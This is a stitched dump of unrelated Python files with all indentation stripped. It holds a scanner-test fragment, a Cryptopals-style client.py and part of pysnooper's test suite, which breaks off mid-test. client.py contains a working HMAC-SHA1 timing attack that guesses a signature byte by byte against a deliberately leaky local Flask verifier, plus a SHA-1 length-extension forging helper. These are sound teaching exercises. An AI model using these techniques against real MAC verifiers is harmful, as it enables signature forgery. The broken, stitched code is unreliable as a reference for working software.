tempdir = TestSystemScanner.temp_dir
# dir\xe9dir [dir]
# file\xd9file [file, 128 bytes]
my_mkdir_latin(b"dir\xe9dir")
my_touch_latin(128, b"file\xd9file")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(2, len(files))
folder, file = tuple(files)
self.assertEqual(0, len(folder.children))
self.assertEqual("dir�dir", folder.name)
self.assertEqual("file�file", file.name)
self.assertEqual(128, file.size)
|
client.py
|
#! /usr/bin/python
# https://www.cryptopals.com/sets/4/challenges/31
# Implement and break HMAC-SHA1 with an artificial timing leak
# SHA-1 implementation taken from https://github.com/ajalt/python-sha1/blob/master/sha1.py
# HMAC: https://en.wikipedia.org/wiki/HMAC
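# For reference, the HMAC construction implemented by HMAC_SHA1() below is:
#   HMAC(K, m) = H((K' xor opad) || H((K' xor ipad) || m))
# where K' is the key padded with zero bytes to the 64-byte SHA-1 block size,
# opad is 0x5c repeated and ipad is 0x36 repeated.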
################################################################################
### SHA-1 ######################################################################
################################################################################
import struct
import io
from time import sleep
import requests
try:
range = xrange
except NameError:
pass
def _left_rotate(n, b):
"""Left rotate a 32-bit integer n by b bits."""
return ((n << b) | (n >> (32 - b))) & 0xffffffff
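# Worked example: _left_rotate(0x80000001, 1) == 0x00000003 -- the top bit
# wraps around to bit 0 while the low bit shifts up to bit 1.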
def _process_chunk(chunk, h0, h1, h2, h3, h4):
"""Process a chunk of data and return the new digest variables."""
assert len(chunk) == 64
#print "Chunk:",[chunk]
#print "Process chunk [before]:",(hex(h0),hex(h1),hex(h2),hex(h3),hex(h4))
w = [0] * 80
# Break chunk into sixteen 4-byte big-endian words w[i]
for i in range(16):
w[i] = struct.unpack(b'>I', chunk[i * 4:i * 4 + 4])[0]
# Extend the sixteen 4-byte words into eighty 4-byte words
for i in range(16, 80):
w[i] = _left_rotate(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1)
# Initialize hash value for this chunk
a = h0
b = h1
c = h2
d = h3
e = h4
for i in range(80):
if 0 <= i <= 19:
# Use alternative 1 for f from FIPS PUB 180-1 to avoid bitwise not
f = d ^ (b & (c ^ d))
k = 0x5A827999
elif 20 <= i <= 39:
f = b ^ c ^ d
k = 0x6ED9EBA1
elif 40 <= i <= 59:
f = (b & c) | (b & d) | (c & d)
k = 0x8F1BBCDC
elif 60 <= i <= 79:
f = b ^ c ^ d
k = 0xCA62C1D6
a, b, c, d, e = ((_left_rotate(a, 5) + f + e + k + w[i]) & 0xffffffff,
a, _left_rotate(b, 30), c, d)
# Add this chunk's hash to result so far
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h4 = (h4 + e) & 0xffffffff
#print "Process chunk [after]:",(hex(h0),hex(h1),hex(h2),hex(h3),hex(h4))
return h0, h1, h2, h3, h4
class Sha1Hash(object):
"""A class that mimics that hashlib api and implements the SHA-1 algorithm."""
name = 'python-sha1'
digest_size = 20
block_size = 64
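# The optional h0..h4 and length_offset constructor arguments below allow
# resuming SHA-1 from a known digest state, which is what the
# length-extension helper fake_message() relies on.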
def __init__(self,h0=0x67452301,h1=0xEFCDAB89,h2=0x98BADCFE,h3=0x10325476,h4=0xC3D2E1F0,length_offset=0):
# Initial digest variables
self._h = (
h0,
h1,
h2,
h3,
h4,
)
# bytes object with 0 <= len < 64 used to store the end of the message
# if the message length is not a multiple of 64
self._unprocessed = b''
# Length in bytes of all data that has been processed so far
self._message_byte_length = length_offset
def update(self, arg):
"""Update the current digest.
This may be called repeatedly, even after calling digest or hexdigest.
Arguments:
arg: bytes, bytearray, or BytesIO object to read from.
"""
if isinstance(arg, (bytes, bytearray)):
arg = io.BytesIO(arg)
# Try to build a chunk out of the unprocessed data, if any
chunk = self._unprocessed + arg.read(64 - len(self._unprocessed))
# Read the rest of the data, 64 bytes at a time
while len(chunk) == 64:
self._h = _process_chunk(chunk, *self._h)
self._message_byte_length += 64
chunk = arg.read(64)
self._unprocessed = chunk
#print self._unprocessed
return self
def digest(self):
"""Produce the final hash value (big-endian) as a bytes object"""
return b''.join(struct.pack(b'>I', h) for h in self._produce_digest())
def hexdigest(self):
"""Produce the final hash value (big-endian) as a hex string"""
return '%08x%08x%08x%08x%08x' % self._produce_digest()
def _produce_digest(self):
"""Return finalized digest variables for the data processed so far."""
# Pre-processing:
message = self._unprocessed
message_byte_length = self._message_byte_length + len(message)
# append the bit '1' to the message
message += b'\x80'
# append 0 <= k < 512 bits '0', so that the resulting message length (in bytes)
# is congruent to 56 (mod 64)
message += b'\x00' * ((56 - (message_byte_length + 1) % 64) % 64)
# append length of message (before pre-processing), in bits, as 64-bit big-endian integer
message_bit_length = message_byte_length * 8
#print message_bit_length
message += struct.pack(b'>Q', message_bit_length)
# Process the final chunk
# At this point, the length of the message is either 64 or 128 bytes.
h = _process_chunk(message[:64], *self._h)
if len(message) == 64:
#print (hex(h[0]),hex(h[1]),hex(h[2]),hex(h[3]),hex(h[4]))
return h
#print (hex(h[0]),hex(h[1]),hex(h[2]),hex(h[3]),hex(h[4]))
return _process_chunk(message[64:], *h)
def sha1(data,h0=None,h1=None,h2=None,h3=None,h4=None,length_offset=0):
"""SHA-1 Hashing Function
A custom SHA-1 hashing function implemented entirely in Python.
Arguments:
data: A bytes or BytesIO object containing the input message to hash.
Returns:
A hex SHA-1 digest of the input message.
"""
if None not in (h0, h1, h2, h3, h4):  # compare against None so a legitimately zero state word still resumes
return Sha1Hash(h0,h1,h2,h3,h4,length_offset).update(data).hexdigest()
return Sha1Hash().update(data).hexdigest()
################################################################################
################################################################################
def xor(a,b):
raw_a = a
raw_b = b
return "".join([chr(ord(raw_a[i])^ord(raw_b[i])) for i in range(len(raw_a))])
def MAC_SHA1(message,key):
return sha1(key+message)
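# fake_message() is a SHA-1 length-extension helper: it parses a known digest
# into the five internal state words and, for each guessed secret-key length
# between min_key and max_key, produces (forged_message, forged_digest)
# candidates by resuming the hash past the original padding.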
def fake_message(original_message,new_message,sha1_hash,min_key=0,max_key=40):
possible_hashes = []
h = [int(sha1_hash[0+i:8+i],16) for i in range(0,40,8)]
#print "TEST:",map(hex,h)
for i in range(min_key,max_key+1):
pad = padding("A"*i+original_message)
possible_hashes.append((original_message+pad+new_message,sha1(new_message,h[0],h[1],h[2],h[3],h[4],i+len(original_message)+len(pad))))
return possible_hashes
def verify_mac_sha1(message,h):
#print key
return MAC_SHA1(message,key) == h  # relies on a module-level `key`; not called anywhere in this script
def padding(data):
message_byte_length = len(data)
# append the bit '1' to the message
pad = b'\x80'
# append 0 <= k < 512 bits '0', so that the resulting message length (in bytes)
# is congruent to 56 (mod 64)
pad += b'\x00' * ((56 - (message_byte_length + 1) % 64) % 64)
message_bit_length = message_byte_length * 8
#print message_bit_length
pad += struct.pack(b'>Q', message_bit_length)
return pad
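# Sanity check: the padding always brings the total length to a multiple of
# 64 bytes. For a 3-byte message, padding("abc") is 0x80, 52 zero bytes and
# an 8-byte length field (61 bytes), so 3 + 61 = 64.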
def main():
global app
global table
table = {}
#x = threading.Thread(target=app.run)
print find_valid_hmac("TEST").encode("hex")
# the original challenge specifies a 50 ms per-byte delay on the server side
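# The timing attack below guesses the HMAC one byte at a time: the server
# compares the signature byte by byte and sleeps after every matching byte,
# so the candidate byte that makes the response take at least one extra
# delay period is taken as correct.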
def find_valid_hmac(name):
delay = 0.05
url = "http://127.0.0.1:5000/test?file="+name+"&signature="
x = ""
r = requests.get(url)
while len(x) < 20:
for i in range(256):  # try every possible byte value
#sleep(0.05) #to avoid DoSing the server
r = requests.get(url+(x+chr(i)).encode("hex"))
if r.elapsed.total_seconds() > (1+len(x))*delay:
x += chr(i)
print x.encode("hex")
break
del(r)
return x
def HMAC_SHA1(data,k,blocksize=64):
global table
if data in table:
return table[data]  # memoize digests so the slow pure-Python SHA-1 isn't recomputed for repeated inputs
if len(k) > blocksize:
k = sha1(k).decode("hex")
if len(k) < blocksize:
k = k + "\x00"*(blocksize-len(k))
print [k]
o_key_pad = xor(k,"\x5c"*blocksize)
i_key_pad = xor(k,"\x36"*blocksize)
h = sha1(o_key_pad + sha1(i_key_pad + data).decode("hex"))
table[data] = h
return h
from flask import Flask,request,abort
import threading
global app
app = Flask(__name__)
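# The /test endpoint below is the artificially leaky verifier: it compares
# the supplied signature to the real HMAC byte by byte, aborts with a 500 on
# the first mismatch, and sleeps 50 ms after every matching byte.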
@app.route('/test', methods=['GET'])
def test():
f = request.args.get('file').encode('ascii')
signature = request.args.get('signature').encode('ascii')
key = "bob"
h = HMAC_SHA1(f,key)
print h
h = h.decode('hex')
s = signature.decode('hex')
for i in range(len(h)):
if i >= len(s) or h[i] != s[i]:
abort(500)
sleep(0.05)
return 'OK'
import socket
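# Alternative raw-socket implementation of the same leaky verification
# endpoint; it is defined here but not invoked anywhere in this script.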
def server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('127.0.0.1', 5000)
sock.bind(server_address)
sock.listen(1)
while True:
connection, client_address = sock.accept()
print "Connection accepted"
data = connection.recv(2048)
x = data.split(' ')[1].split('?')[1].split('&')
d = {}
for i in x:
t = i.split('=')
d[t[0]] = t[1]
f = d['file']
signature = d['signature']
print signature
key = "bob"
h = HMAC_SHA1(f,key)
print h
h = h.decode('hex')
s = signature.decode('hex')
flag = False
for i in range(len(h)):
if i >= len(s) or h[i] != s[i]:
connection.sendall("HTTP/1.1 500 BAD")
flag = True
break
sleep(0.05)
if not flag:
connection.sendall("HTTP/1.1 200 OK")
connection.close()
#@app.route('/kill', methods=['GET'])
#def death():
# exit()
main()
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123",args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi",args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_callable():
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_watch():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
))
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_watch_explode():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'))
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_variables_classes():
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
))
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_single_watch_no_comma():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo')
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_long_variable():
@pysnooper.snoop()
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_long_variable_with_custom_max_variable_length():
@pysnooper.snoop(max_variable_length=200)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_long_variable_with_infinite_max_variable_length():
@pysnooper.snoop(max_variable_length=None)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
)
)
def test_repr_exception():
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop()
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None')
)
)
def test_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
)
)
def test_method_and_prefix():
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ')
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
),
prefix='ZZZ'
)
def test_file_output():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_confusing_decorator_lines():
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
)
)
def test_lambda():
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
)
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = getattr(module, 'f')(7)
assert result == 7
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage='starting'),
CallEntry('SOURCE IS UNAVAILABLE'),
LineEntry('SOURCE IS UNAVAILABLE'),
ReturnEntry('SOURCE IS UNAVAILABLE'),
ReturnValueEntry('7'),
)
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path))
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith('lala')
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
with path.open('w') as output_file:
output_file.write(u'lala')
@pysnooper.snoop(str(path), overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert 'lala' not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
def test_with_block():
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop()
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in recursive call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
# In with in first call
LineEntry('qux()'),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
),
)
def test_with_block_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
